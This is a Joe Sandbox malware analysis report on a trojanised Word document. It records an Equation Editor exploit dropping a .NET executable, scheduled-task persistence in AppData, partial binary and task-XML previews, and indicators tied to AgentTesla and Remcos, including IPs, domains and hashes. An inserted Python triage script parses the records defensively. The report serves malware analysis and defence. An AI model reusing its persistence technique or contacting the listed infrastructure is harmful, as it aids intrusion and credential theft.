Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Scan 368 1.doc
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winDOC@26/22@5/3
EGA Information:
• Successful, ratio: 80%
HCA Information:
• Successful, ratio: 94%
• Number of executed functions: 225
• Number of non-executed functions: 19
Cookbook Comments:
• Found application associated with file extension: .doc
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Active ActiveX Object
• Scroll down
• Close Viewer
• Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
• Execution Graph export aborted for target EQNEDT32.EXE, PID 2152 because there are no executed functions
• HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtEnumerateValueKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
01:37:31 | Task Scheduler | Run new task: pgZzUFYKXcIRkU path: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe
10:37:23 | API Interceptor | 288x Sleep call for process: EQNEDT32.EXE modified
10:37:26 | API Interceptor | 924173x Sleep call for process: obimohohj75.scr modified
10:37:30 | API Interceptor | 74x Sleep call for process: powershell.exe modified
10:37:31 | API Interceptor | 3x Sleep call for process: schtasks.exe modified
10:37:32 | API Interceptor | 375x Sleep call for process: taskeng.exe modified
10:37:33 | API Interceptor | 427203x Sleep call for process: pgZzUFYKXcIRkU.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
172.67.175.222 | http://cya.nz/citizenzcom | malicious | Unknown | cya.nz/citizenzcom
104.26.12.205 | Sky-Beta.exe | malicious | Stealit | api.ipify.org/?format=json
104.26.12.205 | SecuriteInfo.com.Backdoor.Win32.Agent.myuuxz.13708.17224.exe | malicious | Bunny Loader | api.ipify.org/
104.26.12.205 | lods.cmd | malicious | Remcos | api.ipify.org/
104.26.13.205 | SecuriteInfo.com.Trojan.DownLoaderNET.960.9931.28151.exe | malicious | PureLog Stealer, Targeted Ransomware | api.ipify.org/
104.26.13.205 | Sky-Beta-Setup.exe | malicious | Stealit | api.ipify.org/?format=json
104.26.13.205 | ArenaWarSetup.exe | malicious | Stealit | api.ipify.org/?format=json
104.26.13.205 | Sky-Beta Setup 1.0.0.exe | malicious | Unknown | api.ipify.org/?format=json
104.26.13.205 | E4sbo4F6Sz.exe | malicious | Unknown | api.ipify.org/
104.26.13.205 | E4sbo4F6Sz.exe | malicious | Unknown | api.ipify.org/
104.26.13.205 | SecuriteInfo.com.Win64.RATX-gen.31127.4101.exe | malicious | PureLog Stealer, Targeted Ransomware | api.ipify.org/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
covid19help.top | msXkgFIUyS.rtf | malicious | AgentTesla | 104.21.83.128
covid19help.top | BANK LETTER.doc | malicious | AgentTesla | 104.21.83.128
covid19help.top | You2bjAMeg.doc | malicious | HTMLPhisher | 104.21.83.128
covid19help.top | Arrival Notice.doc | malicious | Unknown | 172.67.175.222
covid19help.top | PO.doc | malicious | Remcos | 104.21.83.128
covid19help.top | #1337.doc | malicious | Unknown | 172.67.175.222
covid19help.top | r29EHJocKX.rtf | malicious | Unknown | 104.21.83.128
covid19help.top | aaaaaa.docx.doc | malicious | Unknown | 172.67.175.222
covid19help.top | aaaaaa.docx.doc | malicious | Unknown | 104.21.83.128
covid19help.top | APMR1GTlQS.rtf | malicious | Unknown | 104.21.83.128
api.ipify.org | Purchase Order PDF.exe | malicious | AgentTesla | 104.26.13.205
api.ipify.org | Leoch-Purchase Order.exe | malicious | AgentTesla | 172.67.74.152
api.ipify.org | p silp AI240190.pdf.exe | malicious | AgentTesla | 104.26.12.205
api.ipify.org | SecuriteInfo.com.Win32.PWSX-gen.1728.1300.exe | malicious | AgentTesla | 104.26.12.205
api.ipify.org | SecuriteInfo.com.Heur.15333.25205.exe | malicious | AgentTesla | 172.67.74.152
api.ipify.org | Leoch-Purchase Order.exe | malicious | AgentTesla | 172.67.74.152
api.ipify.org | SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe | malicious | AgentTesla | 104.26.12.205
api.ipify.org | SecuriteInfo.com.Win32.MalwareX-gen.3610.30636.exe | malicious | AgentTesla | 104.26.13.205
api.ipify.org | invoice & packing list.exe | malicious | AgentTesla | 172.67.74.152
api.ipify.org | ZG17uv37pi.exe | malicious | Unknown | 104.26.13.205
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | file.exe | malicious | RisePro Stealer | 104.26.4.15
CLOUDFLARENETUS | dendy.exe | malicious | RisePro Stealer | 104.26.5.15
CLOUDFLARENETUS | 5Dw2hTQmiB.exe | malicious | LummaC | 104.21.44.10
CLOUDFLARENETUS | Purchase Order PDF.exe | malicious | AgentTesla | 104.26.13.205
CLOUDFLARENETUS | file.exe | malicious | LummaC | 104.21.44.10
CLOUDFLARENETUS | Leoch-Purchase Order.exe | malicious | AgentTesla | 172.67.74.152
CLOUDFLARENETUS | p silp AI240190.pdf.exe | malicious | AgentTesla | 104.26.12.205
CLOUDFLARENETUS | https://ortelia.com/Downloads/Curator/CuratorSetup.exe | malicious | Havoc | 1.1.1.1
CLOUDFLARENETUS | https://app.esign.docusign.com/e/er?utm_campaign=GBL_XX_DBU_NEW_2307_FreetoTrialUnlock_Email1AU&utm_medium=email&utm_source=Eloqua&elqCampaignId=29542&s=566810826&lid=32871&elqTrackId=1034fb987fd44c9a9a4d0833ff06a55d&elq=89d72859fe264966a0176d4309dbb1a6&elqaid=60251&elqat=1 | malicious | Unknown | 172.64.151.101
CLOUDFLARENETUS | https://ortelia.com/download-ortelia-curator/ | malicious | Havoc | 1.1.1.1
Match | Associated Sample Name / URL | Detection | Threat Name | Context
7dcce5b76c8b17472d024758970a406b | yDOZ8nTvm8.rtf | malicious | AgentTesla | 172.67.175.222
7dcce5b76c8b17472d024758970a406b | DETAILS.docx.doc | malicious | Remcos | 172.67.175.222
7dcce5b76c8b17472d024758970a406b | R1iBOIfySQ.xlsx | malicious | Hidden Macro 4.0 | 172.67.175.222
7dcce5b76c8b17472d024758970a406b | msXkgFIUyS.rtf | malicious | AgentTesla | 172.67.175.222
7dcce5b76c8b17472d024758970a406b | L2165c5ZiO.rtf | malicious | Remcos | 172.67.175.222
7dcce5b76c8b17472d024758970a406b | Qzr31SUgrS.rtf | malicious | Remcos | 172.67.175.222
7dcce5b76c8b17472d024758970a406b | mrOdyevwvZ.rtf | malicious | Unknown | 172.67.175.222
7dcce5b76c8b17472d024758970a406b | OFFER DETAIL 75645.xls | malicious | Remcos | 172.67.175.222
7dcce5b76c8b17472d024758970a406b | P.O.109961.xls | malicious | Remcos | 172.67.175.222
7dcce5b76c8b17472d024758970a406b | MV SUN OCEAN BUNKER INV.doc | malicious | AgentTesla | 172.67.175.222
36f7277af969a6947a61ae0b815907a1 | msXkgFIUyS.rtf | malicious | AgentTesla | 104.26.12.205, 104.26.13.205
36f7277af969a6947a61ae0b815907a1 | BANK LETTER.doc | malicious | AgentTesla | 104.26.12.205, 104.26.13.205
36f7277af969a6947a61ae0b815907a1 | NEW GRACE- RFQ .doc | malicious | AgentTesla, GuLoader | 104.26.12.205, 104.26.13.205
36f7277af969a6947a61ae0b815907a1 | 78YW3Fcvv0.rtf | malicious | AgentTesla | 104.26.12.205, 104.26.13.205
36f7277af969a6947a61ae0b815907a1 | Booking copy.xls | malicious | AgentTesla | 104.26.12.205, 104.26.13.205
36f7277af969a6947a61ae0b815907a1 | Dados Da Reserva.ppam | malicious | Unknown | 104.26.12.205, 104.26.13.205
36f7277af969a6947a61ae0b815907a1 | Request_For_ Quotation.xlam.xlsx | malicious | AgentTesla | 104.26.12.205, 104.26.13.205
36f7277af969a6947a61ae0b815907a1 | RFQ.doc | malicious | AgentTesla | 104.26.12.205, 104.26.13.205
36f7277af969a6947a61ae0b815907a1 | 302814Q.xlam.xlsx | malicious | AgentTesla | 104.26.12.205, 104.26.13.205
36f7277af969a6947a61ae0b815907a1 | New Order 3118.xlsx | malicious | AgentTesla | 104.26.12.205, 104.26.13.205
                                                        No context
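The dropped-file records that follow, and the Task Scheduler entry in this report's timeline, are easier to act on once they are parsed rather than read. The Python script below is an added example, not part of the Joe Sandbox report and not Joe Sandbox's own code: it reproduces the report's "Entropy (8bit)" measure and upper-case hash format, splits the flattened "Key:Value" records into dicts, and applies a few triage rules. The two sample records and the task path are constructed from values printed in this report; the triage rules, the 7.5 bits/byte entropy threshold, and the user-writable-path heuristic are this example's own assumptions.

```python
"""Triage helpers for Joe Sandbox style dropped-file records and task paths.

Added example, not part of the report or of Joe Sandbox. Sample inputs are
constructed from values printed in the report; rules/thresholds are assumed.
"""
import hashlib
import math
from collections import Counter

# Constructed sample: two dropped-file records, trimmed to the keys used here.
DROPPED_FILE_TEXT = r"""
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:very short file (no magic)
Size (bytes):1
Entropy (8bit):0.0
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA1:356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
Malicious:false
Preview:1
Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Size (bytes):694792
Entropy (8bit):7.9653372839221515
MD5:A1B496997BE52302CB008BB93FABCFBF
SHA1:1A6E056273C58790868D73B61359A652B3D7B4A0
SHA-256:A79ED53396570071A97528394A3A3B33A95EFA65823E42CF2B17AECA682336AB
Malicious:true
"""

# Constructed sample: the scheduled-task target from the report's timeline.
TASK_PATH = r"C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe"


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (0.0 .. 8.0), the measure the
    report labels 'Entropy (8bit)'. Near 8.0 means compressed or encrypted."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def digests(data: bytes) -> dict:
    """MD5 / SHA1 / SHA-256 in the upper-case hex form the report prints."""
    return {
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
    }


def parse_records(text: str) -> list:
    """One dict per record; a record starts at each 'Process:' line. Only the
    first ':' separates key from value, so Windows paths keep their drive."""
    records = []
    for line in text.splitlines():
        if ":" not in line:
            continue
        key, value = (s.strip() for s in line.split(":", 1))
        if key == "Process":
            records.append({})
        if records:
            records[-1][key] = value
    return records


def is_user_writable_path(path: str) -> bool:
    """Assumed heuristic: a task or autorun that points into a per-user or
    temp directory needed no admin rights to plant and deserves a look."""
    p = path.lower().replace("/", "\\")
    return any(m in p for m in ("\\appdata\\", "\\temp\\", "\\users\\public\\"))


def triage(records: list, entropy_threshold: float = 7.5) -> list:
    """Return (sha256, reason) pairs worth escalating. Rules are assumptions:
    sandbox verdict, Equation Editor writing a PE, high-entropy executable."""
    findings = []
    for rec in records:
        sha = rec.get("SHA-256", "?")
        ftype = rec.get("File Type", "")
        parent = rec.get("Process", "").rsplit("\\", 1)[-1].upper()
        if rec.get("Malicious", "").lower() == "true":
            findings.append((sha, "flagged malicious by sandbox"))
        if parent == "EQNEDT32.EXE" and ftype.startswith("PE32"):
            findings.append((sha, "Equation Editor wrote a PE file"))
        try:
            ent = float(rec.get("Entropy (8bit)", "0"))
        except ValueError:
            ent = 0.0
        if "executable" in ftype and ent >= entropy_threshold:
            findings.append((sha, f"high-entropy executable ({ent:.2f} bits/byte)"))
    return findings


if __name__ == "__main__":
    for sha, why in triage(parse_records(DROPPED_FILE_TEXT)):
        print(sha[:16], why)
    print("task path user-writable:", is_user_writable_path(TASK_PATH))
```

Run as a script, it prints three findings, all for the .NET executable that EQNEDT32.EXE wrote, and confirms that the scheduled task points into a per-user directory. Two checks are worth knowing about the entropy figures in these records: the 1-byte file "1" gives 0.0 and the hashes in its record are exactly those of the byte "1", and the 64-byte PowerShell artifact's 0.34726597513537405 is what any 64-byte buffer with 61 null bytes and three distinct non-null bytes yields, so the figure is reproducible from the byte histogram alone.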
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):64
                                                        Entropy (8bit):0.34726597513537405
                                                        Encrypted:false
                                                        SSDEEP:3:Nlll:Nll
                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                        Malicious:false
                                                        Reputation:high, very likely benign file
                                                        Preview:@...e...........................................................
                                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):694792
                                                        Entropy (8bit):7.9653372839221515
                                                        Encrypted:false
                                                        SSDEEP:12288:/n1A7USCVbumqsPi4wousYMHrLEmhH9WNwClKmkDaW4JOQAmnkIlRz15C+ZkR:f1A7UPbumFjwo9nNBxC8GdymkIt5Q
                                                        MD5:A1B496997BE52302CB008BB93FABCFBF
                                                        SHA1:1A6E056273C58790868D73B61359A652B3D7B4A0
                                                        SHA-256:A79ED53396570071A97528394A3A3B33A95EFA65823E42CF2B17AECA682336AB
                                                        SHA-512:4504C2B962069AABC8B33FA3DF57D1663C88E1BC8AB5FAA7B7D1D1EB22FCEF89E263FBB936A0B1DDDFBA59E82763A8FD919AB718B05A308688613E2018882ED5
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 26%
                                                        • Antivirus: Virustotal, Detection: 47%, Browse
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....D f.................@..."......._... ........@.. ....................................@..................................^..W....`... ...........d...6........................................................... ............... ..H............text....?... ...@.................. ..`.rsrc.... ...`... ...B..............@..@.reloc...............b..............@..B.................^......H.......,....O......C....................................................0..A....... F........%.....(......... .........%./...(.....0...(....*.....&*...f.(.....s....}......}....*...0..........~0.....~.......o....~....%-.&~..........s....%.....(...+o.....+......E........d...3...d...j...............+.8.....o.....s......o.....o....&.. ..... ....Y..+...o........(....o......o...... ..... 01..Y..8u...s.......o.....o......+.+......E............9...h.......Z...................+...+..
                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):16384
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3::
                                                        MD5:CE338FE6899778AACFC28414F2D9498B
                                                        SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
                                                        SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
                                                        SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
                                                        Malicious:false
                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):221696
                                                        Entropy (8bit):3.4833944956086045
                                                        Encrypted:false
                                                        SSDEEP:6144:tdecyemMdecyemMdecyemMdecyemMdecyemLLVoEY:AVk
                                                        MD5:947E29D76E4801BC8F8ABFCD8D93DDE2
                                                        SHA1:0AA04CEB81186E08CC71B93E9EF21F4D1DE62329
                                                        SHA-256:04A99B9CED45DEAD8BCCE099FF95009F01B5E58B3DB733A483E28CC6C9472390
                                                        SHA-512:FAD86A1CB25BB1B49E467B90DFA29C6C3E9896CD269BE7060D5F00A217206F5DBF7ECC407E4088B015643530CF5B1603652F3255B53727A9323B2D6438064C35
                                                        Malicious:false
                                                        Preview:8.3.2.6.8.2.5.6.D.o.c.u.m.e.n.t. .c.r.e.a.t.e.d. .i.n. .e.a.r.l.i.e.r. .v.e.r.s.i.o.n. .m.i.c.r.o.s.o.f.t. .o.f.f.i.c.e. .w.o.r.d...T.o. .v.i.e.w. .o.r. .e.d.i.t. .t.h.i.s. .d.o.c.u.m.e.n.t.,. .p.l.e.a.s.e. .c.l.i.c.k. .(.".E.n.a.b.l.e. .e.d.i.t.i.n.g.".). .f.r.o.m. .t.h.e. .y.e.l.l.o.w. .b.a.r. .a.b.o.v.e.A.S.S.I.G.N.M.E.N.T.M.C.S. .4.7.3.:. .M.A.R.K.E.T.I.N.G. .M.A.N.A.G.E.M.E.N.T. .&. .S.T.R.A.T.E.G.Y.S.T.U.D.E.N.T. .N.A.M.E.:. .F.r.a.n.k. .H.u.t.t.o.n.S.T.U.D.E.N.T. .N.o.:. .2.0.7.2.4.4.1.4.I.N.D.E.X. .N.o.:. .5.0.5.6.1.2.0.C.E.N.T.R.E.:. .G.R.E.E.N.F.I.E.L.D.S.1... .i... .G.u.e.r.i.l.l.a. .m.a.r.k.e.t.i.n.g. .s.t.r.a.t.e.g.y. .r.e.f.e.r.s. .t.o. .a. .s.u.r.p.r.i.s.i.n.g. .a.d.v.e.r.t.i.s.i.n.g. .s.t.r.a.t.e.g.y. .a.n.d. .w.i.t.h. .u.n.c.o.n.v.e.n.t.i.o.n.a.l. .i.n.t.e.r.a.c.t.i.o.n.s. .t.o. .p.r.o.m.o.t.e. .t.h.e. .p.r.o.d.u.c.t.s. .a.n.d. .s.e.r.v.i.c.e.s... .G.u.e.r.i.l.l.a. .m.a.r.k.e.t.i.n.g. .s.t.r.a.t.e.g.y. .i.s. .p.u.b.l.i.c.i.t.y. .p.r.a.c.t.i.c.e.s.,. .l.o.w.-.c.o.s.t. .
                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):1536
                                                        Entropy (8bit):1.3586208805849456
                                                        Encrypted:false
                                                        SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbc:IiiiiiiiiifdLloZQc8++lsJe1MzX/
                                                        MD5:B476E311559A9E5A2C88C853AAC17A45
                                                        SHA1:A69669A8B96A2A94BAE5BEBB01085EA30686ED6E
                                                        SHA-256:F567379D184F0A8428D037F3663CCCE9BE0482C525CDA5462C953034648D3FF8
                                                        SHA-512:8875EDC32415713145FEF8C471059CBC5E2D84D618F534F5EDD74E211D973805DAE975F9532ABD2D5C6A89CE75D17BFCF0F3E70C83B4FB8B756DC493768EEC5C
                                                        Malicious:false
                                                        Preview:..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):1024
                                                        Entropy (8bit):0.05390218305374581
                                                        Encrypted:false
                                                        SSDEEP:3:ol3lYdn:4Wn
                                                        MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                        SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                        SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                        SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                        Malicious:false
                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:very short file (no magic)
                                                        Category:dropped
                                                        Size (bytes):1
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3:U:U
                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                        Malicious:false
                                                        Preview:1
                                                        Process:C:\Users\user\AppData\Roaming\obimohohj75.scr
                                                        File Type:XML 1.0 document, ASCII text
                                                        Category:dropped
                                                        Size (bytes):1580
                                                        Entropy (8bit):5.129216868473911
                                                        Encrypted:false
                                                        SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt4xvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTYv
                                                        MD5:6689D2BA65A88C42A4BCA6DB45EFB43A
                                                        SHA1:4DD0917F5FBC434735AD93F5422D936A8AE13F6C
                                                        SHA-256:326AE29321B4350D0CA715724280CA837917D5D417BC365E5F1F70918D5682FA
                                                        SHA-512:0A80F167A6EB2C7CB3F555D4E4A50ED4150B91E05D324925CF8A324BCA0BFEAAEC964BD6786DD926F7715CAF445BA23459E1AD857EB8D4B1F3FDAE17FCB193EA
                                                        Malicious:true
                                                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                        Process:C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe
                                                        File Type:XML 1.0 document, ASCII text
                                                        Category:dropped
                                                        Size (bytes):1580
                                                        Entropy (8bit):5.129216868473911
                                                        Encrypted:false
                                                        SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt4xvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTYv
                                                        MD5:6689D2BA65A88C42A4BCA6DB45EFB43A
                                                        SHA1:4DD0917F5FBC434735AD93F5422D936A8AE13F6C
                                                        SHA-256:326AE29321B4350D0CA715724280CA837917D5D417BC365E5F1F70918D5682FA
                                                        SHA-512:0A80F167A6EB2C7CB3F555D4E4A50ED4150B91E05D324925CF8A324BCA0BFEAAEC964BD6786DD926F7715CAF445BA23459E1AD857EB8D4B1F3FDAE17FCB193EA
                                                        Malicious:false
                                                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:02 2023, mtime=Fri Aug 11 15:42:02 2023, atime=Thu Apr 18 07:37:21 2024, length=327186, window=hide
                                                        Category:dropped
                                                        Size (bytes):1014
                                                        Entropy (8bit):4.523728842953765
                                                        Encrypted:false
                                                        SSDEEP:12:8rzFgXg/XAlCPCHaXtBYB/J89rX+WncJlNhuicvbs4Tx+DtZ3YilMMEpxRljKTTE:8r//XT9Oc9klNegOx+Dv3qKk7N
                                                        MD5:1B41F0B84094E3B1629AE6E9C7A97CDF
                                                        SHA1:904A0D8C32430CA1BE449EB3D8C263C39E3C4950
                                                        SHA-256:F33018199479262195979F5E645E9EE2AE1897A1CCF3F635C1B99875CAF9FBC6
                                                        SHA-512:8A7F5053BF41D3AB0C221C3612BDB42BAECB56CFC27D52735D71CB81210B046191029EB69F5E64AED125E4C42B87B9B3D266A7CE35D0D4738BBE77820502CEC8
                                                        Malicious:false
                                                        Preview:L..................F.... .....o.r.....o.r......k................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......X.D..user.8......QK.X.X.D*...&=....U...............A.l.b.u.s.....z.1......WC...Desktop.d......QK.X.WC.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2......X.D .SCAN36~1.DOC..J.......WB..WB.*.........................S.c.a.n. .3.6.8. .1...d.o.c.......x...............-...8...[............?J......C:\Users\..#...................\\783875\Users.user\Desktop\Scan 368 1.doc.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.c.a.n. .3.6.8. .1...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......783875..........D_....3N...W...9.W.e8...8.....[D_....3N...W...9.W.e8
                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        File Type:Generic INItialization configuration [folders]
                                                        Category:dropped
                                                        Size (bytes):54
                                                        Entropy (8bit):4.592759955827109
                                                        Encrypted:false
                                                        SSDEEP:3:M1hELOFMCm4JiOFMCv:MULOFMpOFMs
                                                        MD5:0285441C82778E35E75EDEF39B63C94D
                                                        SHA1:AB09184C1A91AC9BE48658FB9CEEB14A3C0C0B5D
                                                        SHA-256:F2F22FC8E4A961FF3E6D9910E5637850C656A85DB049D039C6ED04F659AE3332
                                                        SHA-512:896B3DA404DB1F7DEDA6412D25441E63021F5ED98C37E005E436AB46DA565C7679BC0AD5DFE2D47204FC80FE5E02E431D9C7388CB5A089E44095514D907B56C1
                                                        Malicious:false
                                                        Preview:[doc]..Scan 368 1.LNK=0..[folders]..Scan 368 1.LNK=0..
                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):162
                                                        Entropy (8bit):2.4797606462020307
                                                        Encrypted:false
                                                        SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                                        MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                                        SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                                        SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                                        SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                                        Malicious:false
                                                        Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):694792
                                                        Entropy (8bit):7.9653372839221515
                                                        Encrypted:false
                                                        SSDEEP:12288:/n1A7USCVbumqsPi4wousYMHrLEmhH9WNwClKmkDaW4JOQAmnkIlRz15C+ZkR:f1A7UPbumFjwo9nNBxC8GdymkIt5Q
